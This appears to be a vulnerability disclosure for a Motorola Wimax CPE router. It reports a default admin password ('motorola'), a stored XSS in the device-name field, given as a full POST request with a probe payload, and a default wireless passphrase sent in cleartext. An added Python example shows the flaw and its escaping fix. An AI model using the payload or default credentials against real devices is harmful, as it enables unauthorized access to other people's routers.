Motorola Wimax CPE Multiple Vulnerabilities

The Motorola Wimax CPE (Shodan search) contains multiple vulnerabilities. I tested the following: Model ID: CPEi25890, Hardware Version: REV.B, version WMX04.00.01.02.23

#1 Default Password

The initial GET request to the router triggers a POST request to http://1.2.3.4/cgi-bin/f1_fcgi_cgi.fcgi. The default password is shown in the body of the response, and on a first-time install it is even auto-filled in for you!


It looks like some ISPs set a different password, but according to this article a remote firmware update may reset it to the default. You can confirm the default password in the CPEi 725 Series manual too:

In the Password field, type the password (default is motorola)

#2 Stored XSS

An authenticated user can change the device name to include script code.

POST /cgi-bin/f1_fcgi_cgi.fcgi?timeStamp=1389922654157 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: https://1.2.3.4/cgi-bin/f1_fcgi_cgi.fcgi
Connection: Keep-Alive
Content-Length: 161
Content-Type: text/html

set.lan.LAN.X_MOT_DeviceName=mywimax">alert('DF')&nextpage=%2Fusr%2Fbin%2Fwww%2Fhtml%2Fpersonalize%2Fpersonalize_devicename.html&multiget=Modify
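As an added example (not code from the original post or from the Motorola firmware), the Python below parses a form body in the same format as the request above, reproduces the unescaped echo of X_MOT_DeviceName that makes the stored XSS possible, and shows the hardened handler beside it: allow-list the device name on write and HTML-escape it on read. The hostname-style allow-list, the input markup and the sample body are assumptions constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample body modelled on the POST above; the device name carries the
# same harmless alert('DF') probe, with the <script> tags written out in full.
SAMPLE_BODY = (
    "set.lan.LAN.X_MOT_DeviceName=mywimax%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E"
    "&nextpage=%2Fusr%2Fbin%2Fwww%2Fhtml%2Fpersonalize%2Fpersonalize_devicename.html"
    "&multiget=Modify"
)

DEVICE_NAME_KEY = "set.lan.LAN.X_MOT_DeviceName"
# Assumed policy: hostname-style names only (letters, digits, hyphen, 1-32 chars).
DEVICE_NAME_RE = re.compile(r"^[A-Za-z0-9-]{1,32}$")

def parse_body(body: str) -> dict:
    """Decode the urlencoded form body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def render_vulnerable(device_name: str) -> str:
    """Reproduces the flaw: the stored name is echoed into the value attribute as-is."""
    return f'<input name="{DEVICE_NAME_KEY}" value="{device_name}">'

def store_device_name(fields: dict) -> str:
    """Input-side fix: reject any name outside the allow-list before it is stored."""
    name = fields.get(DEVICE_NAME_KEY, "")
    if not DEVICE_NAME_RE.match(name):
        raise ValueError("device name rejected: only [A-Za-z0-9-]{1,32} allowed")
    return name

def render_hardened(device_name: str) -> str:
    """Output-side fix: escape for HTML, quote=True so the attribute context is covered."""
    return f'<input name="{DEVICE_NAME_KEY}" value="{html.escape(device_name, quote=True)}">'

def handle_request(body: str) -> str:
    """Both defences together: validate on write, escape on read."""
    return render_hardened(store_device_name(parse_body(body)))

if __name__ == "__main__":
    fields = parse_body(SAMPLE_BODY)
    print("unescaped:", render_vulnerable(fields[DEVICE_NAME_KEY]))
    print("escaped  :", render_hardened(fields[DEVICE_NAME_KEY]))
    try:
        handle_request(SAMPLE_BODY)
    except ValueError as exc:
        print("rejected :", exc)
    print("accepted :", handle_request(f"{DEVICE_NAME_KEY}=mywimax&multiget=Modify"))
```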


#3 Default Wireless Passphrase?

The Wimax devices appear to come with a default wireless passphrase in addition to the device password.


The wifi_home.@WLANConfiguration[0].PreSharedKey1_KeyPassphrase is always motorola, and the wifi_home.@WLANConfiguration[0].PreSharedKey2_KeyPassphrase is the user-defined wireless password. It is not clear whether 'motorola' is a backdoor passphrase or simply unused. Either way, both values are sent over the network in cleartext when the /cgi-bin/f1_fcgi_cgi.fcgi script loads /etc/www/html/wifi/wifi_security.html via the nextpage parameter.
